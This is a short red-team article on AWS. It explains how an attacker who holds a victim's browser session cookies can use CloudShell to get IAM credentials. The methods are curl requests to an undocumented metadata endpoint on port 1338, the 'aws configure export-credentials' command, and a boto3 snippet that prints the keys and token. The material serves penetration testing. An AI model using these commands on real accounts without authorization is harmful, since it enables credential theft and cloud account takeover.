Article by Nick Frichette

Get IAM Credentials from a Console Session¶

Original Research

Retrieving AWS security credentials from the AWS consoletitle by Christophe Tafani-Dereeper

When performing a penetration test or red team assessment, it is not uncommon to gain access to a developer's machine. This presents an opportunity for you to jump into AWS infrastructure via credentials on the system. For a myriad of reasons you may not have access to credentials in the .aws folder, but instead have access to their browser's session cookies (for example via cookies.sqlite in FireFox).

Gaining access to the Console is great, but it may not be ideal. You may want to use certain tools that would instead require IAM credentials.

To get around this, we can leverage CloudShell. CloudShell exposes IAM credentials via an undocumented endpoint on port 1338. After loading session cookies from the victim into your browser, you can navigate to CloudShell and issue the following commands to get IAM credentials.

[user@cloudshell]$ TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")

[user@cloudshell]$ curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"

Alternatively, you can run the following command, which returns credentials with a short TTL (roughly 15m).

[user@cloudshell]$ aws configure export-credentials --format env

Using boto3 to Retrieve Credentials¶

Alternatively, you can use Python's boto3 library directly within CloudShell to programmatically retrieve the credentials. This method can be useful when you need to integrate credential extraction into a Python script or automation workflow.

import boto3

session = boto3.Session()
creds = session.get_credentials()
print({
    'AccessKey': creds.access_key, 
    'SecretKey': creds.secret_key, 
    'Token': creds.token
})

This approach leverages boto3's automatic credential detection within the CloudShell environment, providing the same temporary credentials that are available through the metadata service endpoint. The credentials obtained this way will have the same TTL limitations as other methods described above.